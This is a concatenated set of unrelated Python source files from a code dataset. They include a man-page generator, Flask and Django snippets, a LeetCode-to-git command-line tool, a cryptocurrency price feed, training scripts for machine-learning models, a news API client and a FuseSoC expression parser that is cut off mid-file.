raise DistutilsOptionError('\'parser\' option is required')
mod_name, func_name = self.parser.split(':')
fromlist = mod_name.split('.')
try:
mod = __import__(mod_name, fromlist=fromlist)
self._parser = getattr(mod, func_name)(
formatter_class=ManPageFormatter)
except ImportError as err:
raise err
self.announce('Writing man page %s' % self.output)
self._today = datetime.date.today()
def run(self):
dist = self.distribution
homepage = dist.get_url()
appname = self._parser.prog
sections = {'authors': ("pwman3 was originally written by <NAME> "
"<<EMAIL>>.\n pwman3 is now maintai"
"ned "
"by <NAME> <<EMAIL>>."),
'distribution': ("The latest version of {} may be "
"downloaded from {}".format(appname,
homepage))
}
dist = self.distribution
mpf = ManPageFormatter(appname,
desc=dist.get_description(),
long_desc=dist.get_long_description(),
ext_sections=sections)
m = mpf.format_man_page(self._parser)
with open(self.output, 'w') as f:
f.write(m)
class ManPageFormatter(argparse.HelpFormatter):
"""
Formatter class to create man pages.
This class relies only on the parser, and not distutils.
The following shows a scenario for usage::
from pwman import parser_options
from build_manpage import ManPageFormatter
# example usage ...
dist = distribution
mpf = ManPageFormatter(appname,
desc=dist.get_description(),
long_desc=dist.get_long_description(),
ext_sections=sections)
# parser is an ArgumentParser instance
m = mpf.format_man_page(parsr)
with open(self.output, 'w') as f:
f.write(m)
The last line would print all the options and help infomation wrapped with
man page macros where needed.
"""
def __init__(self,
prog,
indent_increment=2,
max_help_position=24,
width=None,
section=1,
desc=None,
long_desc=None,
ext_sections=None,
authors=None,
):
super(ManPageFormatter, self).__init__(prog)
self._prog = prog
self._section = 1
self._today = datetime.date.today().strftime('%Y\\-%m\\-%d')
self._desc = desc
self._long_desc = long_desc
self._ext_sections = ext_sections
def _get_formatter(self, **kwargs):
return self.formatter_class(prog=self.prog, **kwargs)
def _markup(self, txt):
return txt.replace('-', '\\-')
def _underline(self, string):
return "\\fI\\s-1" + string + "\\s0\\fR"
def _bold(self, string):
if not string.strip().startswith('\\fB'):
string = '\\fB' + string
if not string.strip().endswith('\\fR'):
string = string + '\\fR'
return string
def _mk_synopsis(self, parser):
self.add_usage(parser.usage, parser._actions,
parser._mutually_exclusive_groups, prefix='')
usage = self._format_usage(None, parser._actions,
parser._mutually_exclusive_groups, '')
usage = usage.replace('%s ' % self._prog, '')
usage = '.SH SYNOPSIS\n \\fB%s\\fR %s\n' % (self._markup(self._prog),
usage)
return usage
def _mk_title(self, prog):
return '.TH {0} {1} {2}\n'.format(prog, self._section,
self._today)
def _make_name(self, parser):
"""
this method is in consitent with others ... it relies on
distribution
"""
return '.SH NAME\n%s \\- %s\n' % (parser.prog,
parser.description)
def _mk_description(self):
if self._long_desc:
long_desc = self._long_desc.replace('\n', '\n.br\n')
return '.SH DESCRIPTION\n%s\n' % self._markup(long_desc)
else:
return ''
def _mk_footer(self, sections):
if not hasattr(sections, '__iter__'):
return ''
footer = []
for section, value in sections.iteritems():
part = ".SH {}\n {}".format(section.upper(), value)
footer.append(part)
return '\n'.join(footer)
def format_man_page(self, parser):
page = []
page.append(self._mk_title(self._prog))
page.append(self._mk_synopsis(parser))
page.append(self._mk_description())
page.append(self._mk_options(parser))
page.append(self._mk_footer(self._ext_sections))
return ''.join(page)
def _mk_options(self, parser):
formatter = parser._get_formatter()
# positionals, optionals and user-defined groups
for action_group in parser._action_groups:
formatter.start_section(None)
formatter.add_text(None)
formatter.add_arguments(action_group._group_actions)
formatter.end_section()
# epilog
formatter.add_text(parser.epilog)
# determine help from format above
return '.SH OPTIONS\n' + formatter.format_help()
def _format_action_invocation(self, action):
if not action.option_strings:
metavar, = self._metavar_formatter(action, action.dest)(1)
return metavar
else:
parts = []
# if the Optional doesn't take a value, format is:
# -s, --long
if action.nargs == 0:
parts.extend([self._bold(action_str) for action_str in
action.option_strings])
# if the Optional takes a value, format is:
# -s ARGS, --long ARGS
else:
default = self._underline(action.dest.upper())
args_string = self._format_args(action, default)
for option_string in action.option_strings:
parts.append('%s %s' % (self._bold(option_string),
args_string))
return ', '.join(parts)
class ManPageCreator(object):
"""
This class takes a little different approach. Instead of relying on
information from ArgumentParser, it relies on information retrieved
from distutils.
This class makes it easy for package maintainer to create man pages in
cases, that there is no ArgumentParser.
"""
pass
def _mk_name(self, distribution):
"""
"""
return '.SH NAME\n%s \\- %s\n' % (distribution.get_name(),
distribution.get_description())
if AUTO_BUILD:
build.sub_commands.append(('build_manpage', None))
| StarcoderdataPython |
3593201 | <gh_stars>0
"""
Write Python code that asks a user how many pizza slices they want. The pizzeria charges Rs
123.00 a slice. if user order even number of slices, price per slice is Rs 120.00. Print the total
price depending on how many slices user orders.
"""
n = int(input("Enter no' of slices: "))
if n%2==0:
print("Total Price is",120.00*n)
else:
print("Total Price is",123.00*n) | StarcoderdataPython |
3335217 | from django.contrib import admin
# Register your models here.
# Setup the URLs and include login URLs for the browsable API. | StarcoderdataPython |
1663455 | from django.db import models
class TransformQuerySet(models.query.QuerySet):
def __init__(self, *args, **kwargs):
super(TransformQuerySet, self).__init__(*args, **kwargs)
self._transform_fns = []
def _clone(self, klass=None, setup=False, **kw):
c = super(TransformQuerySet, self)._clone(klass, setup, **kw)
c._transform_fns = self._transform_fns[:]
return c
def transform(self, fn):
c = self._clone()
c._transform_fns.append(fn)
return c
def iterator(self):
result_iter = super(TransformQuerySet, self).iterator()
if self._transform_fns:
results = list(result_iter)
for fn in self._transform_fns:
fn(results)
return iter(results)
return result_iter
class TransformManager(models.Manager):
def get_query_set(self):
return TransformQuerySet(self.model)
| StarcoderdataPython |
9671040 | <gh_stars>0
import os
from flask import Flask, flash, request, redirect, url_for, jsonify
from werkzeug.utils import secure_filename
import json
UPLOAD_FOLDER = 'uploads'
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
@app.route('/hello')
def hello_world():
return "hello world"
@app.route('/')
def index():
return "this is a index page"
@app.route('/user/<username>')
def show_user(username):
return 'username is: %s' % username
@app.route('/login', methods=['GET', 'POST'])
def get():
if request.method == 'GET':
return 'this is a get'
else:
username = request.args.get('username')
return 'username is {}'.format(username)
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/upload', methods=['GET', 'POST'])
def upload():
if request.method == 'POST':
f = request.files.get('file')
if f and allowed_file(f.filename):
filename = secure_filename(f.filename)
basepath = os.path.dirname(__file__)
uploadpath = os.path.join(basepath, app.config['UPLOAD_FOLDER'], filename)
print('basepath:' + uploadpath)
f.save(uploadpath)
downpath = load_uploadpic(uploadpath, filename)
print('downloadpath:' + downpath)
return jsonify({'filename': f.filename, 'uploadpath': uploadpath, 'downloadpath': downpath, })
if __name__ == '__main__':
app.run()
| StarcoderdataPython |
9650450 | """
App entry point
Authors:
- <NAME> (<EMAIL>)
"""
import glob
import os
import time
import traceback
from multiprocessing import Process
from multiprocessing.managers import SyncManager
from typing import Any, Dict, List, Optional
import click
from click.core import Context
from click.exceptions import Abort
from leet2git.config_manager import ConfigManager
from leet2git.file_handler import create_file_handler, generate_files
from leet2git.leetcode_client import LeetcodeClient
from leet2git.my_utils import (
get_question_id,
mgr_init,
reset_config,
wait_to_finish_download,
)
from leet2git.question_db import QuestionData, QuestionDB
from leet2git.readme_handler import ReadmeHandler
from leet2git.version import version_info
# pylint: disable=broad-except
@click.group()
@click.version_option(version="", message=version_info())
@click.option(
"--source-repository",
"-s",
default="",
help="The path to the folder where the code will be saved. Overrides the default config",
)
@click.option(
"--language",
"-l",
default="python3",
help="The language to run the command. Overrides the default config",
)
@click.pass_context
def leet2git(
ctx: Context,
source_repository: Optional[str] = "",
language: Optional[str] = "",
):
"""Leet2Git App
\f
Args:
ctx (Context): the context
source_repository (str): source repository path
language (str): the programming language
"""
cm = ConfigManager()
override_config = {}
if language:
override_config["language"] = language
if source_repository:
override_config["source_path"] = source_repository
cm.load_config(override_config)
ctx.obj = cm
@leet2git.command()
@click.argument("question-id", type=int)
@click.pass_obj
def get(cm: ConfigManager, question_id: int):
"""Generates all the files for a question
Args:
question_id (int): the question question_id
"""
qdb: QuestionDB = QuestionDB(cm.config)
lc = LeetcodeClient()
qdb.load()
if qdb.check_if_exists(question_id):
click.secho("Question already imported")
return
if not qdb.check_if_slug_is_known(question_id):
qdb.set_id_title_map(lc.get_id_title_map())
qdb.save()
# get question data
args: Dict[int, QuestionData] = {}
generate_files(args, question_id, qdb.get_title_from_id(question_id), lc, time.time(), cm.config)
if question_id in args:
# store data
qdb.add_question(args[question_id])
qdb.save()
# update readme
rh = ReadmeHandler(cm.config)
rh.build_readme(qdb.get_sorted_list(sort_by="creation_time"))
@leet2git.command()
@click.argument("question-id", type=int)
@click.pass_obj
def submit(cm: ConfigManager, question_id: int):
"""Submit a question to Leetcode
Args:
question_id (int): the question question_id
"""
qdb: QuestionDB = QuestionDB(cm.config)
qdb.load()
# create submit file
if qdb.check_if_exists(question_id):
file_handler = create_file_handler(qdb.get_question(question_id), cm.config)
code = file_handler.generate_submission_file()
lc = LeetcodeClient()
try:
question_data = qdb.get_question(question_id)
title_slug = (
question_data.title_slug
if question_data.title_slug
else qdb.get_title_from_id(question_id)
)
lc.submit_question(code, question_data.internal_id, title_slug, cm.config["language"])
except Exception as e:
click.secho(e.args, fg="red")
click.secho(traceback.format_exc())
else:
click.secho(f"Could not find the question with id {question_id}")
@leet2git.command()
@click.argument("question-id", type=int)
@click.pass_obj
def run(cm: ConfigManager, question_id: int):
"""Run a question on Leetcode Servers
Args:
question_id (int): the question question_id
"""
qdb: QuestionDB = QuestionDB(cm.config)
qdb.load()
# create test file
if qdb.check_if_exists(question_id):
file_handler = create_file_handler(qdb.get_question(question_id), cm.config)
code = file_handler.generate_submission_file()
lc = LeetcodeClient()
try:
question_data = qdb.get_question(question_id)
title_slug = (
question_data.title_slug
if question_data.title_slug
else qdb.get_title_from_id(question_id)
)
raw_inputs = "\n".join(["\n".join(i.split(", ")) for i in question_data.inputs])
lc.submit_question(
code,
question_data.internal_id,
title_slug,
cm.config["language"],
True,
raw_inputs,
)
except Exception as e:
click.secho(e.args, fg="red")
click.secho(traceback.format_exc())
else:
click.secho(f"Could not find the question with id {question_id}")
@leet2git.command()
@click.pass_obj
def import_all(cm: ConfigManager):
"""Get all solutions and generate their files"""
qdb: QuestionDB = QuestionDB(cm.config)
lc = LeetcodeClient()
qdb.load()
has_next: bool = True
last_key: str = ""
offset: int = 0
imported_cnt = 0
try:
while has_next:
jobs: List[Process] = []
manager = SyncManager()
manager.start(mgr_init)
ret_dict: Dict[Any, Any] = manager.dict()
submissions = lc.get_submission_list(last_key, offset)
if "submissions_dump" not in submissions:
if imported_cnt <= 0:
raise ValueError(
"No submission to import. Are you logged in to leetcode? (Chrome or Firefox)"
)
break
for submission in submissions["submissions_dump"]:
qid: int = get_question_id(submission["title_slug"], qdb, lc)
if (
submission["status_display"] == "Accepted"
and submission["lang"] == cm.config["language"]
and not qdb.check_if_exists(qid)
):
# pre-store the question
data = QuestionData(id=qid)
qdb.add_question(data)
p = Process(
target=generate_files,
args=(
ret_dict,
qid,
submission["title_slug"],
lc,
submission["timestamp"],
cm.config,
submission["code"],
),
)
jobs.append(p)
p.start()
imported_cnt += wait_to_finish_download(jobs, ret_dict, qdb)
has_next = submissions["has_next"]
last_key = submissions["last_key"]
offset += 20
qdb.save()
except KeyboardInterrupt:
click.secho("Stopping the process...")
imported_cnt += wait_to_finish_download(jobs, ret_dict, qdb)
except Exception as e:
click.secho(e.args, fg="red")
click.secho(traceback.format_exc())
finally:
manager.shutdown()
qdb.save()
# update readme
rh = ReadmeHandler(cm.config)
rh.build_readme(qdb.get_sorted_list(sort_by="creation_time"))
click.secho(f"In total, {imported_cnt} questions were imported!")
@leet2git.command()
@click.argument("question-id", type=int)
@click.pass_obj
def delete(cm: ConfigManager, question_id: int):
"""Delete a question and its files
Args:
question_id (int): the question question_id
"""
qdb: QuestionDB = QuestionDB(cm.config)
qdb.load()
if qdb.check_if_exists(question_id):
data = qdb.get_data()[question_id]
try:
os.remove(data.file_path)
os.remove(data.test_file_path)
except FileNotFoundError as e:
click.secho(e.args)
qdb.delete_question(question_id)
qdb.save()
# update readme
rh = ReadmeHandler(cm.config)
rh.build_readme(qdb.get_sorted_list(sort_by="creation_time"))
click.secho(f"The question {question_id} was removed.")
else:
click.secho(f"The question {question_id} could not be found!")
@leet2git.command()
@click.option(
"--source-repository", "-s", default="", help="the path to the folder where the code will be saved"
)
@click.option("--language", "-l", default="python3", help="the default language")
@click.option("--create-repo", "-c", is_flag=True, help="generates a git repository")
@click.pass_obj
def init(cm: ConfigManager, source_repository: str, language: str, create_repo: bool):
"""Creates a new configuration file and can generate a git repository.
\f
Args:
source_repository (str, optional): the path to the folder where the code will be saved.
Defaults to "".
language (str, optional): the default language. Defaults to "python3".
create_repo (bool, optional): generates a git repository. Defaults to False.
"""
reset_config(cm, source_repository, language, load_old=False)
cm.load_config()
if create_repo:
data = QuestionData(language=cm.config["language"])
file_handler = create_file_handler(data, cm.config)
file_handler.generate_repo(cm.config["source_path"])
@leet2git.command()
@click.option(
"--source-repository", "-s", default="", help="the path to the folder where the code will be saved"
)
@click.option("--language", "-l", default="python3", help="the default language")
@click.option(
"--soft/--hard",
default=True,
help="A soft reset only erases the database. A hard reset also erase the files.",
)
@click.pass_obj
def reset(cm: ConfigManager, source_repository: str, language: str, soft: bool):
"""Reset the configuration file
\f
Args:
source_repository (str, optional): the path to the folder where the code will be saved.
Defaults to "".
language (str, optional): the default language. Defaults to "python3".
soft(bool, optional): the reset hardness. Defaults to soft.
"""
if not soft:
try:
click.confirm(
f"This will delete EVERY solution and test file inside \
the {cm.config['source_path']} folder. \
Still want to proceed?",
abort=True,
)
except Abort:
return
file_list = glob.glob(os.path.join(cm.config["source_path"], "src", "leetcode_*")) + glob.glob(
os.path.join(cm.config["source_path"], "tests", "test_*")
)
for file in file_list:
try:
os.remove(file)
except FileNotFoundError as e:
click.secho(e.args)
else:
try:
click.confirm("This will delete the question database. Still want to proceed?", abort=True)
except Abort:
return
reset_config(cm, source_repository, language)
cm.load_config()
qdb = QuestionDB(cm.config)
qdb.reset()
if not soft:
data = QuestionData(language=cm.config["language"])
file_handler = create_file_handler(data, cm.config)
file_handler.generate_repo(cm.config["source_path"])
if __name__ == "__main__":
leet2git() # pylint: disable=no-value-for-parameter
| StarcoderdataPython |
1753836 | import requests
from . import FeedSource, _request_headers
class Bittrex(FeedSource):
def _fetch(self):
feed = {}
url = "https://bittrex.com/api/v1.1/public/getmarketsummaries"
response = requests.get(url=url, headers=_request_headers, timeout=self.timeout)
result = response.json()["result"]
feed["response"] = response.json()
for thisMarket in result:
for base in self.bases:
for quote in self.quotes:
if quote == base:
continue
if thisMarket["MarketName"] == base + "-" + quote:
self.add_rate(feed, base, quote, float(thisMarket["Last"]), float(thisMarket["Volume"]))
return feed
| StarcoderdataPython |
12842869 | from abc import ABCMeta, abstractmethod
class AbstractTransformation:
__metaclass__ = ABCMeta
@abstractmethod
def transform_image(self, image): pass
@abstractmethod
def transform_position(self, x, y, width, height): pass
@abstractmethod
def generate_random(self): pass
| StarcoderdataPython |
3488975 | <filename>api/endpoints/projects/topicProject.py
from flask import Blueprint, jsonify, request
from models.models import (
db,
TopicModel,
ProjectModel,
RelProjectTopic,
)
topicProject_api = Blueprint("topicProject_api", __name__)
@topicProject_api.route("/addProjectTopic", methods=("POST",))
def addProjectTopic():
body = request.get_json()
topic = str(body["topic"])
projectId = str(body["projectId"])
error = None
if not topic or not projectId:
error = "Missing Data"
if TopicModel.query.filter_by(name=topic).first() is None:
error = f"Topic {topic} does not exist"
if ProjectModel.query.filter_by(id=projectId).first() is None:
error = f"Project with id {projectId} does not exist"
if (
RelProjectTopic.query.filter_by(topic=topic, projectId=projectId).first()
is not None
):
error = f"Topic {topic} already is in the project with id {projectId}"
if error is None:
add_topic = RelProjectTopic(topic, projectId)
db.session.add(add_topic)
db.session.commit()
message = f"Topic {topic} added to the project with id {projectId} successfully"
return jsonify({"status": "ok", "message": message}), 200
else:
return jsonify({"status": "bad", "error": error}), 400
@topicProject_api.route("/getProjectTopics", methods=("POST",))
def getProjectTopics():
body = request.get_json()
projectId = str(body["projectId"])
error = None
if not projectId:
error = "Missing Data"
if error is None:
response = RelProjectTopic.query.filter_by(projectId=projectId).all()
topics = []
for item in response:
topics.append({"topic": item.topic})
return jsonify({"topics": topics}), 200
else:
return jsonify({"status": "bad", "error": error}), 400
@topicProject_api.route("/deleteProjectTopic", methods=("DELETE",))
def deleteProjectTopic():
body = request.get_json()
projectId = str(body["projectId"])
topic = str(body["topic"])
error = None
if not projectId:
error = "Missing Data"
if (
RelProjectTopic.query.filter_by(topic=topic, projectId=projectId).first()
is None
):
error = f"Topic not in project with id {projectId}"
if error is None:
RelProjectTopic.query.filter_by(topic=topic, projectId=projectId).delete()
db.session.commit()
message = f"Topic {topic} removed from the project with id {projectId}"
return jsonify({"status": "ok", "message": message}), 200
else:
return jsonify({"status": "bad", "error": error}), 400
| StarcoderdataPython |
8156959 | <gh_stars>0
from django.apps import AppConfig
class DjangoKmatchConfig(AppConfig):
name = 'django_kmatch'
verbose_name = 'Django Kmatch'
| StarcoderdataPython |
1836164 | import json
import argparse
import numpy as np
import tensorflow as tf
import transformers as tm
from load_data import *
def build_clf_model(vocab_size, params):
# Build Transformer for Language Modeling task
model = tf.keras.Sequential()
model.add(tf.keras.layers.Embedding(vocab_size, params["embed"], batch_input_shape=[params["batch"], None]))
for i in range(max(1, params["layers"])):
model.add(tf.keras.layers.LSTM(params["hidden"], return_sequences=True, stateful=True, dropout=params["drop"]))
model.add(tf.keras.layers.Dense(vocab_size))
return model
def train_clf_model(model, params, train_dataset, test_dataset):
model.compile(loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
optimizer=tf.keras.optimizers.Adam(params["lr"]), metrics=['accuracy'])
checkpoint = tf.keras.callbacks.ModelCheckpoint('../../trained/clf_lstm.ckpt/clf_lstm' + "_" + str(params["dimension"]) + "/clf_lstm",
monitor='val_accuracy', verbose=1, save_best_only=True, save_weights_only=True)
history = clf_lstm.fit(train_dataset, epochs=params["epochs"], validation_data=test_dataset, callbacks=[checkpoint])
if __name__ == "__main__":
# Parse arguments
parser = argparse.ArgumentParser(description='clf_lstm.py')
parser.add_argument('--conf', type=str, required=True, help="JSON file with training parameters.")
opt = parser.parse_args()
# Load training parameters
params = {}
with open(opt.conf) as conf_file:
params = json.load(conf_file)["clf_lstm"]
# Load char2idx dict from json file
with open(params["vocab"]) as f:
vocab = json.load(f)
# Build dataset from encoded unlabelled midis
train_dataset = load_dataset(params["train"], vocab, params["dimension"])
test_dataset = load_dataset(params["test"], vocab, params["dimension"])
train_dataset = build_dataset(train_dataset, params["batch"])
test_dataset = build_dataset(test_dataset, params["batch"])
# Calculate vocab_size from char2idx dict
vocab_size = len(vocab)
# Rebuild generative model from checkpoint
clf_lstm = build_clf_model(vocab_size, params)
if params["finetune"]:
ckpt = tf.train.Checkpoint(net=clf_lstm)
ckpt.restore(tf.train.latest_checkpoint(params["pretr"]))
# Add emotion head
clf_lstm.add(tf.keras.layers.Dense(1, name="emotion_head"))
# Train lstm
train_clf_model(clf_lstm, params, train_dataset, test_dataset)
| StarcoderdataPython |
5046346 | <reponame>lht19900714/Leetcode_Python<filename>Algorithms/0119_Pascal's_Triangle_II/Python/Pascal's_Triangle_II_Solution_1.py
# Space: O(n)
# Time: O(n^2)
# same approach as solution 1, compress space from n^2 to n
class Solution:
def getRow(self, rowIndex):
data = [1 for _ in range(rowIndex + 1)]
for i in range(rowIndex + 1):
temp = data[:]
for j in range(i):
if j == 0:
continue
else:
data[j] = temp[j] + temp[j - 1]
return data
| StarcoderdataPython |
5005804 | <gh_stars>0
#!/usr/local/bin/python
#encoding:utf8
import sys, os, datetime, time, pty, pprint, shutil, re
sys.path.insert(0, "..")
from fabric.api import(
run, env, prompt, put, cd
)
from fabric.contrib.files import (
exists as fab_exists,
append as fab_append,
)
from fabric.context_managers import (
prefix
)
def setup(setting):
pass
| StarcoderdataPython |
8045148 | <filename>streamlabs/streamlabsrun.py
import requests
from config import STREAMLABS_SECRET, STREAMLABS_ID, STREAMLABS_REDIRECT
from decimal import Decimal
import pprint
import os
import json
import time
def streamlabs_handler(q_twitchbeagle, q_gpio):
#Grab streamlabs tokens
headers = []
while True:
try:
with open('slrefreshtoken', 'r') as f:
r_token = f.read()
with open('slaccesstoken', 'r') as f:
a_token = f.read()
token_call = {
'grant_type' : 'refresh_token',
'client_id' : STREAMLABS_ID,
'client_secret' : STREAMLABS_SECRET,
'redirect_uri' : STREAMLABS_REDIRECT,
'refresh_token' : r_token
}
donations_params = {
'access_token' : a_token,
'limit' : 1,
'currency' : "USD"
}
time.sleep(10)
r = requests.post(
'https://streamlabs.com/api/v1.0/token',
data = token_call,
headers = headers
)
a_token = r.json()['access_token']
r_token = r.json()['refresh_token']
with open('slaccesstoken', 'w') as f:
f.write(a_token)
donations_params['access_token'] = a_token
with open('slrefreshtoken', 'w') as f:
f.write(r_token)
donationsurl = "https://streamlabs.com/api/v1.0/donations"
donate = requests.get(
donationsurl,
headers = headers,
params = donations_params
)
#usd_two_places = float(format(usd_value, '.2f')))
donationinfo = donate.json()['data'][0]
#print('amount', donationinfo['amount'])
#print('donor', donationinfo['name'])
#print('message', donationinfo['message'])
with open("streamlabs_latest_donation", 'r') as f:
latestdonation = int(f.read())
if latestdonation != donationinfo['donation_id']:
queueEvent = {
'eventType' : 'electrical',
'event' : 'bits'
}
q_twitchbeagle.put(queueEvent)
TWOPLACES = Decimal(10) ** -2
queueEvent = {
'eventType' : 'twitchchatbot',
'event' : 'Donation from %s for $%s.' % (
donationinfo['name'],
Decimal(donationinfo['amount']).\
quantize(TWOPLACES))
}
q_twitchbeagle.put(queueEvent)
with open("streamlabs_latest_donation", 'w') as f:
print(donationinfo['donation_id'])
print("WE ARE WRITING TO THE FILE")
f.write(str(donationinfo['donation_id']))
print("WE HAVE WRITTEN TO THE FILE")
except Exception,e:
print e
pass
| StarcoderdataPython |
6471510 | import numpy as np
from ptools.R4C.policy_gradients.actor_critic_shared.ac_shared_model import ACSharedModel
from ptools.R4C.trainer import FATrainer
class ACSharedTrainer(FATrainer):
def __init__(
self,
acs_model: ACSharedModel,
verb= 1,
**kwargs):
FATrainer.__init__(self, actor=acs_model, verb=verb, **kwargs)
self.actor = acs_model # INFO: type "upgrade" for pycharm editor
self.num_of_actions = self.envy.num_actions()
if self.verb>0:
print(f'\n*** ACTrainer for {self.envy.name} initialized')
print(f' > actions: {self.envy.num_actions()}, exploration: {self.exploration}')
# update is performed for both: Actor and Critic
def update_actor(self, inspect=False):
batch = self.memory.get_all()
observations = self._extract_from_batch(batch, 'observation')
actions = self._extract_from_batch(batch, 'action')
#rewards = self._extract_from_batch(batch, 'reward')
dreturns = self._extract_from_batch(batch, 'dreturn')
next_observations = self._extract_from_batch(batch, 'next_observation')
terminals = self._extract_from_batch(batch, 'game_over')
if inspect:
print(f'\nBatch size: {len(batch)}')
print(f'observations: {observations.shape}, {observations[0]}')
print(f'actions: {actions.shape}, {actions[0]}')
#print(f'rewards {rewards.shape}, {rewards[0]}')
print(f'next_observations {next_observations.shape}, {next_observations[0]}')
print(f'terminals {terminals.shape}, {terminals[0]}')
dreturns_norm = self.zscore_norm(dreturns)
loss = self.actor.update_batch(
observations= observations,
actions= actions,
#rewards= rewards,
dreturns= dreturns_norm,
next_observations= next_observations,
terminals= terminals,
discount= self.discount)
self.memory.reset()
return loss | StarcoderdataPython |
1651508 | from enum import Enum, unique
@unique
class Game(str, Enum):
ALL = "All"
HALO_CE = "HaloCombatEvolved"
HALO_2 = "Halo2"
HALO_2_ANNIVERSARY = "Halo2Anniversary"
HALO_3 = "Halo3"
HALO_4 = "Halo4"
HALO_REACH = "HaloReach"
| StarcoderdataPython |
1765839 | <gh_stars>0
from app import app
import urllib.request,json
from .models import source,article
Source = source.Source
Article = article.Article
# Getting api key
api_key = app.config['NEWS_API_KEY']
base_url = app.config["SOURCE_API_BASE_URL"]
articles_url = app.config["ARTICLE_API_BASE_URL"]
def get_sources(category):
'''
Function that gets the json response to our url request
'''
get_sources_url = base_url.format(category,api_key)
with urllib.request.urlopen(get_sources_url) as url:
get_sources_data = url.read()
get_sources_response = json.loads(get_sources_data)
source_results = None
if get_sources_response['sources']:
source_results_list = get_sources_response['sources']
source_results = process_sources(source_results_list)
return source_results
def process_sources(source_list):
'''
Function that processes the source result and transform them to a list of Objects
Args:
source_list: A list of dictionaries that contain source details
Returns :
source_results: A list of source objects
'''
source_results = []
for source_item in source_list:
id = source_item.get('id')
name = source_item.get('name')
description = source_item.get('description')
url = source_item.get('url')
category = source_item.get('category')
language = source_item.get('language')
country = source_item.get('country')
if url:
source_object = Source(id,name,description,url,category,language,country)
source_results.append(source_object)
return source_results
def get_articles(id):
'''
Function that gets the json response to our url request
'''
get_articles_url = articles_url.format(id,api_key)
with urllib.request.urlopen(get_articles_url) as url:
get_articles_data = url.read()
get_articles_response = json.loads(get_articles_data)
article_results = None
if get_articles_response['articles']:
article_results_list = get_articles_response['articles']
article_results = process_articles(article_results_list)
return article_results
def process_articles(article_list):
'''
Function that processes the source result and transform them to a list of Objects
Args:
source_list: A list of dictionaries that contain source details
Returns :
source_results: A list of source objects
'''
article_results = []
for article_item in article_list:
id = article_item.get('id')
name = article_item.get('name')
author = article_item.get('author')
title = article_item.get('title')
description = article_item.get('description')
url = article_item.get('url')
urlToImage = article_item.get('urlToImage')
publishedAt = article_item.get('publishedAt')
content = article_item.get('content')
if url:
article_object = Article(id,name,author,title,description,url,urlToImage,publishedAt,content)
article_results.append(article_object)
return article_results
# def get_article(id):
# get_article_details_url = base_url.format(id,api_key)
# with urllib.request.urlopen(get_article_details_url) as url:
# article_details_data = url.read()
# article_details_response = json.loads(article_details_data)
# article_object = None
# if article_details_response:
# id = article_details_response.get('id')
# name = article_details_response.get(' name')
# author = article_details_response.get('author')
# title = article_details_response.get('title')
# description = article_details_response.get('description')
# url = article_details_response.get('url')
# urlToImage = article_details_response.get('urlToImage')
# publishedAt = article_details_response.get('publishedAt')
# content = article_details_response.get('content')
# article_object =Article(id, name,author,description,title,url,urlToImage,publishedAt,content)
# return article_object | StarcoderdataPython |
11270812 | <filename>matplotlib_exercise/interactive/rm_point.py
from matplotlib import pyplot as plt
import numpy as np
LEFT_CLICK = 1
RIGHT_CLICK = 3
class PointRemover:
"""point remover"""
def __init__(self, pts):
pts = np.asarray(pts)
fig, ax = plt.subplots()
self.fig = fig
self.ax = ax
self.ax.set_xlim([0, 3])
self.ax.set_ylim([0, 3])
self.xs = pts[:, 0]
self.ys = pts[:, 1]
self.ax.set_title("right click to remove point")
# register point objects which reacts mouse pick event
self.plot_objects, = self.ax.plot(self.xs, self.ys, 'o', picker=5)
# register event handler
self.fig.canvas.mpl_connect("pick_event", self.remove_point)
def remove_point(self, event):
"""
remove point when user acts right click
"""
if event.mouseevent.button != RIGHT_CLICK:
return
if event.artist != self.plot_objects:
# do nothing
return
if not len(event.ind):
# do nothing
return
# find nearest object from position which is mouse clicked
mouse_x = event.mouseevent.xdata
mouse_y = event.mouseevent.ydata
distances = np.hypot(mouse_x - self.xs[event.ind],
mouse_y - self.ys[event.ind])
argmin = distances.argmin()
remove_index = event.ind[argmin]
self.xs = np.delete(self.xs, remove_index)
self.ys = np.delete(self.ys, remove_index)
self.plot_objects.set_data(self.xs, self.ys)
self.fig.canvas.draw()
def main():
pts = 3 * np.random.rand(10, 10)
generator = PointRemover(pts)
plt.show()
if __name__ == '__main__':
main()
| StarcoderdataPython |
12806610 | # Copyright FuseSoC contributors
# Licensed under the 2-Clause BSD License, see LICENSE for details.
# SPDX-License-Identifier: BSD-2-Clause
r"""Support for parsing String expression syntax in core files
FuseSoC core files allow strings matching the following pseudo-BNF:
exprs ::= expr
| expr exprs
expr ::= word
| conditional
word ::= [a-zA-Z0-9:<>.\[\]_-,=~/^]+ (one or more alphanum/special chars)
conditional ::= condition "?" "(" exprs ")"
condition ::= "!" word
| word
A condition of the form "foo ? (bar)" is interpreted as 'if the "foo" flag is
set, then "bar", otherwise nothing'. Similarly, "!foo ? (bar)" is interpreted
as 'if the "foo" flag is not set then "bar", otherwise nothing'.
Expanding some exprs with a set of flags results in a space-separated string
containing each word that matched.
"""
from pyparsing import (
Forward,
OneOrMore,
Optional,
Suppress,
Word,
alphanums,
Group,
ParseException,
)
def _cond_parse_action(string, location, tokens):
"""A parse action for conditional terms"""
# A conditional term (see _make_cond_parser) has 2 or 3 tokens, depending
# on whether it was negated or not.
assert len(tokens) in [2, 3]
return (
(True, tokens[1], tokens[2])
if len(tokens) == 3
else (False, tokens[0], tokens[1])
)
_PARSER = None
def _get_parser():
"""Return a pyparsing parser for the exprs syntax
This returns a basic "AST" that consists of a list of "exprs". Each expr is
represented by either a string (if it's just a word) or a tuple of the form
(negated, flag, exprs).
Here, negated is a boolean which is true if the condition should be
negated. flag is a word giving the flag to match for the condition. exprs
is the AST for the list of exprs inside the parentheses.
To avoid creating the parser repeatedly, this function is memoized.
"""
global _PARSER
if _PARSER is not None:
return _PARSER
word = Word(alphanums + ":<>.[]_-,=~/^~")
exprs = Forward()
conditional = (
Optional("!")
+ word
+ Suppress("?")
+ Suppress("(")
+ Group(exprs)
+ Suppress(")")
)
exprs <<= OneOrMore(conditional ^ word)
conditional.setParseAction(_cond_parse_action)
_PARSER = exprs
return _PARSER
def _simplify_ast(raw_ast):
"""Simplify an AST that comes out of the parser
As well as replacing pyparsing's ParseResults with bare lists, this merges
adjacent non-condition words. For example, "a b" parses to ["a", "b"]. This
function merges that to ["a b"].
